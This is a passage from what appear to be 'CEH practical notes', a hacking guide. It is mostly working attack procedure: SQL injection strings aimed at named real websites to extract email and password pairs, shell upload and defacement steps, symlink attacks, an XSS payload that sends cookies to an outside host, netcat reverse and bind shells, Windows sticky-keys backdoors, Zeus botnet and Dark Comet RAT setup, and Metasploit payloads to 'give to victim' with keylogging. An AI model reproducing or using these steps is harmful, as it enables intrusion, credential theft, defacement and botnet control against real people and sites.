admin_login
album
assignment
login
---------------------------------------------------------------------------------------------------
Finding Tables Using Limit :
http://www.geca.ac.in/departments/hod.php?id=-
14+/**//*!12345union+select*//**/1,2,3,4,table_name,6,7,8,9+from+/*!information_schema.tabl
es*/+where+/*!table_schema*/+like+database()+limit+1,1
Limit increment like -> 1,1
1,2
58. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Eg:
http://www.viratcooker.com/recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,vers
ion()))--
msg: Could not query:XPATH syntax error: ' 5.5.32-cll'
=====================================================================
Step 2: [Find Tables] Inject --> +and extractvalue(rand(),concat(0x0a,(select
concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database()
limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from
/*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :RecipeIngredients'
-----------------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from
/*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 1,1)))--+
msg: Could not query:XPATH syntax error: ' :SS_categories'
------------------------------------------------------------------------
Respectively :~ For 2,3,4,5,6,7,8.....
msg : Could not query:XPATH syntax error: ' :SS_ordered_carts'
Could not query:XPATH syntax error: ' :SS_orders'
Could not query:XPATH syntax error: ' :SS_products'
Could not query:XPATH syntax error: ' :SS_products2'
Could not query:XPATH syntax error: ' :SS_special_offers'
Could not query:XPATH syntax error: ' :categories'
Could not query:XPATH syntax error: ' :details'
Could not query:XPATH syntax error: ' :productrange'
Could not query:XPATH syntax error: ' :recipes'
59. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Could not query:XPATH syntax error: ' :visitors'
=====================================================================
Note : Convert table name to HEX [String to hex conversion]
Eg : details : 64657461696c73 or 0x64657461696c73
=====================================================================
Step 3: [Finding Columns] Inject --> +and extractvalue(rand(),concat(0x0a,(select
concat(0x3a,column_name) from information_schema.columns WHERE
table_name=0x64657461696c73 limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,column_name) from
/*!information_schema.columns*/ /*!WHERE*/ /*!column_name=0x64657461696c73*/ limit
0,1)))--+
msg: Could not query:XPATH syntax error: ' :cust_firstname'
----------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Respectively :~ For 2,3,4,5,6,7,8.....
msg: Could not query:XPATH syntax error: ' :cust_lastname'
msg: Could not query:XPATH syntax error: ' :cust_country'
msg: Could not query:XPATH syntax error: ' :cust_zip'
msg: Could not query:XPATH syntax error: ' :cust_state'
msg: Could not query:XPATH syntax error: ' :cust_city
msg: Could not query:XPATH syntax error: ' :cust_address'
msg: Could not query:XPATH syntax error: ' :cust_phone'
=====================================================================
Note : I got
Table -> users
Columns -> Password & Email
60. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
So,
=====================================================================
Step 4: Fetching Details Inject ---> +and extractvalue(rand(),concat(0x0a,(select
concat(email,0x3a,password) from users limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(email,0x3a,password) from
/*!users*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :email:password'
=====================================================================
4. DNN Portal Hacking
1 : inurl:tabid/176/Default.aspx
2 : inurl:"/portals/0/" site:.com
3 : inurl:/tabid/36/language/en-US/Default.aspx
4 : inurl:/portals/0/default.aspx
5 : DNN(Link Gallary)
6 : inurl:/tabid/36/language/en-US/Default.aspx
7 : inurl:fcklinkgallery.aspx
step 1 : http://www.parallax.com/tabid/768/productid/92/default.aspx [ Find a website with
above vanulabilities ]
> Replace : /tabid/768/productid/92/default.aspx
> With : /Providers/Htmleditorproviders/fck/fcklinkgallery.aspx
step 2 : http://www.parallax.com/Providers/Htmleditorproviders/fck/fcklinkgallery.aspx
step 3 : click on File (A File On Your Site) and then replace the link with -->
javascript:__doPostBack('ctlURL$cmdUpload','')
step 4 : up will see the uploading button. Upload { shell , Deface it , put your signature}
step 5: http://www.parallax.com/portals/0/shadow.txt
5. Simlink Attack
1] Upload shell 404.php on your hacked website and root the webserver.
2] Upload contact.php & database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
61. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
> eg : http://getec.com.ar/wp-content/plugins/akismet/contact.php
3] go to [sec. info] in your shell then [readable : etc/passwd <view>]
4] copy all username & passwd from [ etc/passwd ]
5] paste in [ http://site.com/contact.php ] [ config fucker ] tab.
6] now open your both links : [ http://site.com/database.php & http://site.com/configweb ]
> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/configweb/
7] on configweb page [ you have some text that contain user & password ] [ these files are
reverse or linked website details ]
8] Now login to them using database.php [ change password in database ]
9] login to main site then and deface there index.php page.
6. XSS
1. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
2. <IMG SRC="javascript:alert('XSS');">
3. <IMG SRC=javascript:alert('XSS')>
4. <IMG SRC=JaVaScRiPt:alert('XSS')>
5. <IMG SRC=JaVaScRiPt:alert('XSS')>
6. <IMG SRC=javascript:alert("XSS")>
7. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
8. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
10. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
11. <IMG
SRC=javascript:al

1;rt('XSS')>
12. <IMG
SRC=javascri&#
0000112t:alert(
'XSS')>
13. <IMG SRC="javascript:alert('XSS');">
==========================================================================
Hands On Series – Cross Site Scripting (XSS) Part 1
In this episode we start dealing with Cross Site Scripting (XSS) attacks.
62. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
CSS = Cascading Style Sheets
XSS = Cross Site Scripting
Cross Site Scripting is a technique used to add script to a trusted site that will be executed on other users
browsers.
A key element to XSS is that one user can submit data to a website that will later be displayed for other
users.
It is nessesary that the bad guy NOT mess up the HTML structure, otherwise the result will be web
defacement rather then attacking other users.
The hackme site has been updated and improved (more about that in a moment)
and now includes a section for XSS which we will be using in this episode.
As usual, for the “Hands on Series” I recommend that you listen to these episodes while viewing the
hacking test site and
have the show notes visible and ready to cut and paste from.
If we look at the source for the page we will see this:
Lets start by trying to somehow add an attribute so that when someone mouses over the name, the
javascript will be executed.
----------------------------------------------------------------------------------------------------------------------------
Attack #1 – Against Email Address
=================================
Attack 1: Original
<a href=”mailto:john@somedomain.com“>John Doe</a>
Attack 1: Desired addition
onmouseover=”alert(„Hacked‟);”
Attack 1: Desired Result
<a href=”mailto:bob@bob.com” onmouseover=”alert(„Hacked‟);”>Bob Smith</a>
Attack 1: Attack String
bob@bob.com” onmouseover=”alert(„Hacked‟);
63. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Attack 1: Actual Result
<a href=”mailto:bob@bob.com” onmouseover=”alert(„Hacked‟);”>Bob Smith</a>
Sucess! Mouse over the Name you entered and you see a popup that says “I hacked you”.
At this point we have proven that we can insert code onto the site and have it executed by a web
browser!
This attack is only executed based on a user event (the user mousing over the link)
Lets try creating a script tag, which will get executed while the page is loaded by the browser (so
basically right away).
-----------------------------------------------------------------------------------------------------------------------------
Attack #2 – Against Email Address
=================================
Attack 2: Original
<a href=”mailto:john@somedomain.com“>John Doe</a>
Attack 2: Desired addition
<script>alert(„Hacked‟);</script>
Attack 2: Desired Result
<a href=”mailto:bob@bob.com”><script>alert(„Hacked‟);</script><”>Bob Smith</a>
Attack 2: Attack String
bob@bob.com”><script>alert(„Hacked‟);</script><”
Attack 2: Actual Result
<a href=”mailto:bob@bob.com”><script>alert(„Hacked‟);</script><”“>Bob
Smith</a>
Failure! No popup takes place.
Notice the Actual Result does not match the Desired Result.
This is because of htmlentities as mentioned in the helper notes.
-----------------------------------------------------------------------------------------------------------------------------
Attack #3 – Against Title
=========================
64. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Attack 3: Original
<td>Works Great</td>
Attack 3: Desired addition
<script>alert(„Hacked‟);</script>
Attack 3: Desired Result
<td><script>alert(„Hacked‟);</script></td>
Attack 3: Attack String
Works Great<script>alert(„Hacked‟);</script>
Attack 3: Actual Result
<td>Works Great<script>alert('Hacked');</script></td>
Failure! No popup takes place.
This almost worked, except that the single and double quotes get escaped, so lets try making something
that doesnt need quotes.
-----------------------------------------------------------------------------------------------------------------------------
Attack #4 – Against Title
=========================
In the alert function lets use the global variable document.domain in the attack string.
Attack 4: Attack String
Works Great<script>alert(document.domain);</script>
Attack 4: Actual Result
<td>Works Great<script>alert(document.domain);</script></td>
Success! A popup should appear that says hackme.ntobjectives.com
Maybe this isnt convincing enough… lets try cookies.
-----------------------------------------------------------------------------------------------------------------------------
Attack #5 – Against Title
=========================
65. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Attack 5: Attack String
Works Great<script>alert(document.cookie);</script>
Attack 5: Actual Result
<td>Works Great<script>alert(document.cookie);</script></td>
Success! A popup should appear that shows all your cookie data.
Theres nothing stopping the hacker from having the user send this data to their server.
I have setup a page for displaying inputs sent to it, but it makes sure to escape characters to make sure
this isnt an attack point.
http://hackme.ntobjectives.com/xss/bin.php
Try it now
http://hackme.ntobjectives.com/xss/bin.php?abc=123
You should be shown that abc=123
This page will display anything you put in the GET params.
I want to push your cookie data over to my site, so that I can attempt a session take over.
-----------------------------------------------------------------------------------------------------------------------------
Attack #6 – Against Title
=========================
Attack 6: Original
<td>Works Great</td>
Attack 6: Desired addition
<script>window.location=‟http://hackme.ntobjectives.com/xss/bin.php?var=‟+document.cookie;</script
>
We have already established that I cannot insert those single quotes that I need around the URL, so we
need to enter into a little more advanced methods.
Using the javascript function String.fromCharCode allows me to get around needing quotes by turning
each decimal value into its character, and it doesnt require any quotes.
66. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
So we just convert our desired string into decimal first
This:
http://hackme.ntobjectives.com/xss/bin.php?var=
becomes:
104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46,
99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61
and the attack string becomes
Attack 6: Attack String
Works
Great<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,104,97,99,107,109,101
, 46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,
105,110,46,112,104,112,63,118,97,114,61)+document.cookie;</script>
Attack 6: Actual Result
<td>Works
Great<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,104,97,99,107,109,101
, 46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,
105,110,46,112,104,112,63,118,97,114,61)+document.cookie;</script></td>
Success! Your browser should be sitting on http://hackme.ntobjectives.com/xss/bin.php and showing
you all the data from your cookies.
If this were an attackers site, it would just collect the info and pass you back to the page you came from,
and its unlikely you would have ever noticed that your session information had been stolen.
69. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
8. PHP Disclosing [ site.com/a.php?id=index.php ] [ Disclose index.php ]
70. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
9. Manipulating Parameters
Step1 : open site and search for hidden elements...
71. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Step2 : Change the hidden elements value using temper data or developer toolkit [
Firefox add-ons ]
78. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
System Hacking
1. ADS [AlterNet Data Streaming]
Practical Guide to Alternative Data Streams in NTFS
step1 : type "tab.mp4" >C:hacktab.mp4:tab.mp4
go to location --> C:hack
type command :
i. dir -> it show all stuff in directory then conform that tab.mp4 has been made with 0kb
size.......then ,
ii. start vlc tab.mp4:tab.mp4
To deduct ads file use (Only recovery tools can find these files):
i. ADS Spy v1.11
ii. get my data back
2. System Password Hacking & Cracking
ophCrack (Crack password)
John The Ripper (Crack password)
Cain & Able (Crack password)
slax work (Crack password)
hiren boot cd (Remove password)
ERD commander (till win 7) [reset password & repair & recovery of windows form boot
sector virus] (Remove password)
Saminside [windows tool] [U can dump any sam file to it for cracking] (Remove password)
Kon-Boot (Login Page Bypassing)
3. Back Doors
1. Win-XP
> c:windows/system32
> copy CMD.EXE
> Change Name to " sethc.exe "
> Put back sethc.exe to " system32 " folder
79. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
2. Win-7
> c:windows/system32
> look for " ULTRAMAN.EXE " change its permission , ownership and name .
> copy cmd .exe to desktop and rename it to " ULTRAMAN.EXE " put back it in
system32 folder.
NOW :
> at login page press shift 5 times.
> cmd will pop up type command
> net user <username> /del , /add , * [ remove and reset password ]
3. NetCat : [ Netcat can simply be described as a tool that can read and write to
TCP and UDP ports. This dual functionality suggests that Netcat runs in two
modes:“client” and “server”. ]
I. Connect to TCP/UDP Ports
> localhost ~ # nc -h [ Help ]
> localhost ~ # nc -vv www.site.com 22 [ nc -vv <site> <port> ]
Bind Shell
> Victim / User1 :
> C:>nc -lvvp 4444 -e cmd.exe
> Attacker / User2 :
> BT ~ # nc -v 192.168.0.198 4444 [ User1 "cmd" comes to User2 ]
Reverse Shell
> User1 :
> C:>nc -lvvp 4444
> User2 :
> BT ~ # nc -v 192.168.0.198 4444 -e /bin/bash [ Now, User2 is sending
his "shell" to User1 ]
80. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Uploading Netcat After Hacking With Metasploit :
meterpreter > upload /pentest/windows-binaries/tools/nc.exe c:WINDOWSSYSTEM32
meterpreter > reg enumkry -k HKLMsoftwareMicrosoftWindowsCurrentVersionRun
meterpreter > reg setval -k HKLMsoftwareMicrosoftWindowsCurrentVersionRun -v
NETCAT -d C:WINDOWSsystem32nc.exe" -L -d -p 1234 -e cmd.exe"
meterpreter > reg enumkey -k HKLMsoftwareMicrosoftWindowsCurrentVersionRun
Note : Netcat can be installed in win xp,vista,7 [ Once netcat is installed
sucessfully on victim os no need to exploit use commands :]
root@bt:~# nc <victim ip> <port>
root@bt:~# nc 192.168.217.141 1234
4. Steganography
1. hiding text on image
> run
> cmd
> cd desktop
> copy /b image.jpg+password.txt final_image.jpg
2. OpenPuff
> Freeware, 256-bit multi-encryption, Carrier chains, Multi-layered obfuscation
82. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
5. Detect Steganography
Backtrack Forensics: Steganoghraphy
Menu: Forensics -> Forensic Analysis Tools
Directory: /usr/local/bin/
stegbreak
stegcompare
stegdeimage
stegdetect
stegdecect is a tool to detect steganography in image files, it supports different methods, which
used to hide content. Currently, the detectable schemes are: jsteg, jphide (unix and windows),
invisible secrets, outguess 01.3b, F5 (header analysis), appendX and camouflage. Stegbreak is
used to launch dictionary attacks against JSteg-Shell, JPHide and OutGuess 0.13b.
Before we start to use the tools we need an image, which has some hidden content. Let's review a
few hiding apps before using stegdetect. As I didn't found any preinstalled in BT, so I installed
steghide for first, which can hide content in jpeg, bmp, wav, au files.
Using steghide:
apt-get install steghide - installation
steghide --info IMG_4422.JPG - get info from the image (how much data can be hidden)
steghide --embed -ef mysecret.txt -cf IMG_4422.JPG -sf steg.jpg -p mypass -Z - hide
mysecret.txt with password "mypass", and create a new file, where the file is hidden, and don't
compress data
steghide --embed -ef mysecret.txt -cf IMG_4422.JPG -sf steg.jpg -p mypass - same as the
previous but w/ compression
steghide --extract -xf mysecret2.txt -sf steg2.jpg -p mypass - extract the file
The bad news is that stegdetect won't detect steghide algorithm. Despite the fact, I tried it to ses
what happens.
83. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Using stegdetect:
stegdetect -t [list of tests] steg.jpg - where tests can be (by default jopifa enabled):
j - Tests if information has been embedded with jsteg.
o - Tests if information has been embedded with outguess.
p - Tests if information has been embedded with jphide.
i - Tests if information has been hidden with invisible secrets.
f - Tests if information has been hidden with F5.
F - Tests if information has been hidden with F5 using a more sophisticated but fairly slow
detection algorithm.
a - Tests if information has been added at the end of file, for example by camouflage or
appendX.
stegdetect -s[number] steg.jpg - setting sensitivity
Actually setgdetect found jphide for the original and the created image as well, so it's clearly
false positive.
I tried to see what stegbreak can do, and created a list of password where I put only one line, the
correct password.
stegbreak -f passlist.txt steg.jpg
I got the following error: "stegbreak: fopen: /usr/local/share/stegbreak/rules.ini: No such file or
directory"
I downloaded the source and placed the ini file in the said location, but you can also download it
from here.
After that I got a "Segmentation fault" error. I couldn't find a working solution for this problem,
however it's a known bug.
Second I tried outguess, which can hide info in jpeg files.
84. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Using Outguess :
apt-get install outguess
outguess -k "mypass" -d index.html IMG_4422.JPG out2.jpg - hides index.html in
IMG_4422.JPG
Unfortunately stegdetect doesn't detect the hidden file (probably because I used outguess v2),
even if increasing the sensitivity, as you can see:
My last try was with jphide, I used the windows version, as had no luck with installing the one
for Linux. It can be downloaded from here.
As you can see stegdetect can detect it, when increasing sensitivity, but as it claims the same
thing for the original image, so...
stegcompare can compare the original and the image which stores information, but I couldn't
figure out what the output means.
tegdeimage - not sure about what it should do, also gives the following error:
"/home/stego_analysis/compress/dscf0033.jpg : error: No such file or directory"
looking at the source code:
73 if (jpg_open("/home/stego_analysis/compress/dscf0033.jpg") == -1)
74 return;
it is clear that it will never run, unless you have such an image.
Overall I'm not really convinced by the stegdetect toolset, it's buggy, and doesn't really find
steganography correctly.
Official website for steghide: http://steghide.sourceforge.net/
Official website for stegdetect and outguess: http://www.outguess.org/
Official website for jphide: http://linux01.gwdg.de/~alatham/stego.html
87. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
outguess :
6. Bypassing Login Page Windows With Backtrack
Make a bootable backtrack pendrive
Boot the system and open backtrack
Open Terminal
mkdir /root/Desktop/p7771 [ Create any folder ]
fdisk -l
mount /dev/sda2 /root/Desktop/p7771 [ Mount Your windows C-Drive ]
ls -la /root/Desktop/p7771/
cd /pentest/password/chntpw
./chntpw -i Desktop/p7771/Windows/System32/config/sam
Press - 1 [ Edit User Data And Password ]
Press - 1 [ Clear Blank User Password ]
Press - q [ Quit ]
Press - y [ Write hive file ? ]
93. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Malwares
1. Botnet
I ] How To Find Cpanel :
A] we need a compromised website with Symlink attack eg :
link:www.site.com/akismet/configweb [ it has all password files ]
1] python cracker.py http://www.pjmi.net/wp-content/plugins/akismet/configweb/
'/root/Desktop/ab' [ copy all password to ab folder from compromised Symlink website ]
2] upload cpanal.php to your shell.
3] copy all password to your cpanal.php
4] run command on your previous shell "eg: wso.php" for user name ---> ls /var/mail
5] copy all user to your cpanel.php
6] click on start it will show you list of active cpanel
7] find website from reverse ip lookup
8] default port for cpanel :2082 [ www.site.com:2082 ]
II ] Configuring Zeus Botnet :
A ] Creating IRC Server :
1] open c-panel
2] go into public folder
3] create folder [ Eg : XXX ]
4] upload your IRC scripts [Zeus.rar in your cpanal to make your cpanal an IRC
Server ]
5] extract the Zeus.rar to server.
6] open www.site.com/XXX/install/index.php
NOW : Now we will setup a database and link it with our IRC server.
B ] Creating Database :
7] go into cpanel & click into my sql database wizard
8] crate a new database and user
Eg : Yahoo >> Next
Eg : User Name = yahoo
Eg : Password = Click on " Generate Password " [ Copy/Rembember [ User Name & Password ]
94. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
9] Click on create user.
10] Go to = www.site.com/XXX/install/index.php
> give password that has been generated.
11] Come back to your database page and assign/give permision or click on all
privilidge.
12] Copy username & database name and go to -->
www.site.com/XXX/install/index.php [ Under Mysql Server ]
> give the user name.
> give the database name.
13] Click on next step [ Database will be created and linked with IRC server ]
14] Now for login in botnet panel we have to give : password [ Eg:abc123 ]in -->
www.site.com/XXX/install/index.php [ Under Root User ] [ By default user will be "admin" ]
15] Now create encryption key Eg : 123123 [ Under Options : ]
16] Before Pressing " install " [ In www.site.com/XXX/install/index.php ] go
back to your folder " XXX " [ Where you have uploaded your IRC ]
> Right click on --> system [ Folder ]
> Change Permission to --> 777 [Read-Write-Exicute]
17] Go back to control panel [ www.site.com/XXX/install/index.php ] Press "
Install "
18] Now go to --> www.site.com/XXX/cp.php
> Username = admin
> Password = abc123
C ] Configuring Bot :
19] Open & Extract "client.rar" .
20] Run "gzero.exe"
21] Click On Builder > click on " edit ".
> configuration file of bot will be opened.
> replace all links with your server path -- > www.site.com/XXX/
> Eg. http://www.rumahbaut.com/xxx/cfg.bin ----->
http://www.site.com/xxx/cfg.bin
> Eg. http://www.rumahbaut.com/xxx/tr.exe ------>
http://www.site.com/xxx/tr.exe
> Eg. http://www.rumahbaut.com/xxx/gate.php --->
http://www.site.com/xxx/gate.php
> Eg. http://www.rumahbaut.com/xxx/cfg1.bin ----->
http://www.site.com/xxx/cfg1.bin
> Eg. Encryption key = 1221421412 ------> Your encryption key [ 12312]
22] Click on " BUILD THE BOT CONFIGURATION " name Eg. BOT
Then ,
95. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
23] Click on " BUILD THE BOT EXECUTABLE " name Eg. tr.exe
D] Uploading The Bot :
24] Go to your IRC server folder where u uploaded & Extracted your zeus.rar file
[ www.site.com/ ]
25] Upload Both file that u have created "BOT" & "tr.exe"
NOTE : If doesn't UPLOAD : Try to compress and upload OR UPLOAD Both bot from your
shell. [wso.php]
97. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
3. Trojans [ Top Ten RAT ( Remote Administrative Tools ) ]
Dark Comet [ Setting Up Dark Comet RAT ]
1. Run client.exe
> allow connection
> Edit Server
> main setting
> connection setting
> Ip: Get local IP < Your IP>
> port : <any>
> Server Setup
> melt server
> Server Shield
> Anti Virtual Box
> Icon Setting
> Generate Server
> active keylogger
> create server
> click on connection.
> port listining mode
2. Give app to victim
3. Control Its PC
107. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Cyber Gate
4. Worms
A worm is similar to a virus by design and is considered to be a sub-class of a virus. Worms
spread from computer to computer, but unlike a virus, it has the capability to travel without any
human action. A worm takes advantage of file or information transport features on your system,
which is what allows it to travel unaided.
The biggest danger with a worm is its capability to replicate itself on your system, so rather than
your computer sending out a single worm, it could send out hundreds or thousands of copies of
itself, creating a huge devastating effect. One example would be for a worm to send a copy of
itself to everyone listed in your e-mail address book. Then, the worm replicates and sends itself
out to everyone listed in each of the receiver's address book, and the manifest continues on down
the line.
Due to the copying nature of a worm and its capability to travel across networks the end result in
most cases is that the worm consumes too much system memory (or network bandwidth),
causing Web servers, network servers and individual computers to stop responding. In recent
worm attacks such as the much-talked-about Blaster Worm, the worm has been designed to
tunnel into your system and allow malicious users to control your computer remotely.
108. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Penetration testing
Types Of Testing :
1. White-Box Testing
2. Black-Box Testing
3. Grey-Box Testing
4. Internal Testing
5. External Testing
Process Of Pen-testing :
1. Information gathering
2. Scanning & Banner Grabbing
3. Vulnerability Scanning
4. Exploitation ( Obtaining Access )
5. Maintaining Access & Erasing Evidence
Tools :
1. Metasploit
2. Core-impact
METASPLOIT
Vulnerability : A weakness that allows an attacker to compromise the secrity of
system.
Exploits : Doing the step by step procedure of gathering information
Payload : the process to gain access which is blocked by user
Encoders : The process to remove tracks.
109. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Need for Metasploit
1. difficult to manage, update, customize dozen of exploits available on internet for
different technologies
2. customization of exploits will be time consuming & one also need high skills do
to same
METASPLOIT
Testing framework for Penetration testing contains 1300+exploit
http://cve.mitre.org
rapid7.com
www.exploit-db.com
110. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
I. Windows XP
To open Metasploit in kali Linux or backtrack use command : msfconsole
RCE ( Netapi ) ( Remote Code Execution ) [Win XP SP-2,3 -> vulnerable OS]
msfconsole
search netapi
use exploit/windows/smb/ms08_067_netapi [ CVE NO = 067 ]
show options
set RHOST [TARGET IP] -> 192.168.1.20
set PAYLOAD windows/meterpreter/bind_tcp
OR
set PAYLOAD windows/meterpreter/reverse_tcp [ Test other payload also ]
set LHOST 192.168.1.150 [Attacker Ip Address]
set LHOST [MY IP ADDRESS]
exploit
So we got successful meterpreter session It means u remotely login to xp-os.
now use help command for listing meterpreter commands.
Meterpreter Commands
meterpreter > getuid
meterpreter > ps
meterpreter > migrate 1444 [ migrate to that process which have admin privileges. ]
meterpreter > idletime
meterpreter > hashdump
meterpreter > screenshot
meterpreter > shell
> c:> net user root *
>c:> exit
111. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Uploading Netcat :
meterpreter > upload /pentest/windows-binaries/tools/nc.exe c:WINDOWSSYSTEM32
meterpreter > reg enumkry -k HKLMsoftwareMicrosoftWindowsCurrentVersionRun
meterpreter > reg setval -k HKLMsoftwareMicrosoftWindowsCurrentVersionRun -v
NETCAT -d C:WINDOWSsystem32nc.exe" -L -d -p 1234 -e cmd.exe"
meterpreter > reg enumkey -k HKLMsoftwareMicrosoftWindowsCurrentVersionRun
Note : Netcat can be installed in win xp,vista,7 [ Once netcat is installed successfully on victim
os no need to exploit use commands :]
root@bt:~# nc <victim ip> <port>
root@bt:~# nc 192.168.217.141 1234
More Commands :
meterpreter > cat <file name>
meterpreter > download C:<file name>
meterpreter > upload C:<file name>
meterpreter > searrch -d C: *d
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
meterpreter > uictl disable keybord
meterpreter > uictl enable keybord
meterpreter > run [ press tab show many more commands ]
meterpreter > run vnc
Creating Backdoor :
meterpreter > run metsvc [Maximum Virus And Trojens Work On 31337 Port]
meterpreter > background [ to go back ]
112. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
NOTE : What if our connection break or victim patch his vulnerability to connect with our
"Backdoor" :-
use exploit/multi/handler
set payload/windows/metsvc_bind_tcp
show options
set rhost < victim >
set lport 31337 ---------> because our backdoor is working on 31337 port.
exploit
meterpreter > run
meterpreter >
116. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
II. Windows Server 2003
Windows Server Hacking [ 2003 SP - 1,2 ]
RCE ( Netapi ) ( Remote Code Execution ) [ windows server 2003 SP-1,2,platinum ]
msfconsole
exploit/windows/smb/ms06_040_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [MY IP ADDRESS]
set RHOST [TARGET IP]
exploit
III. Windows 7
Windows 7 Hacking
(dot)EXE [ Trojan ] [ Hack Any Windows Os ]
root@#~/ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.17.128 LPORT=4444
x > /root/12345.exe
NOTE : Give 12345.exe [ virus ] to victim
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set lhost < Our Ip >
set lport 4444 ---------> because our virus is working on 4444 port
exploit
meterpreter > run
119. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
IV. Browser Exploits
Autopwn [ combo of may exploits ] [See also : Java bean jmx17_jmxbean ]
use auxiliary/server/browser_autopwn
show options
set LHOST <My Ip >
set SRVHOST < My Server is hosted on my computer so again my ip >
set SRVPORT 80
set URIPATH /
exploit
125. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
VII. DLL Injection
1. Hack Windows 7 with Metasploit using Kali Linux.
Machine 1: Host Kali Linux Machine
Machine 2: Target Windows 7 Machine
msfconsole
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf > set payload windows/meterpreter/reverse_tcp
msf > show options
msf > set SRVHOST 192.168.31.20
msf > set LHOST 192.168.31.20
msf > exploit
msf > sessions
msf > sessions -i 1
meterpreter >
126. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Buffer Overflow
#include<stdio.h>
void main()
{
char *name;
char *command;
name=(char *)malloc(10);
command=(char *)malloc(128);
printf("address of name is : %dn",name);
printf("address of command is : %dn",command);
printf("Difference between address is : %dn",command-name);
printf("Enter your name");
gets(name);
printf("Hello %sn",name);
system(command);
}
root@kali:~#
root@kali:~# gcc buffer.c -o buffer
root@kali:~# ./buffer
Eg: Output : 347582347y5823458723453425534523453452345234cat /etc/passwd
1] Buffer Over Flow Attack On orbital_viewer
msfconsole
search bof
search orbital
use exploit/windows/fileformat/orbital_viewer_orb
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST <Our IP>
exploit
exit
Note : Give " msf.orb " to victim now,
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
127. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
set lhost < Our Ip >
set lport 4444 ---------> because our virus is working on 4444 port
exploit
meterpreter > run
II. Buffer Overflow In VLC Player
use exploit/windows/fileformat/vlc_modplug_s3m
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST <Our IP>
exploit
exit
Note : Give " msf.s3m " to victim now,
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set lhost < Our Ip >
set lport 4444 ---------> because our virus is working on 4444 port
exploit
meterpreter > run
130. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
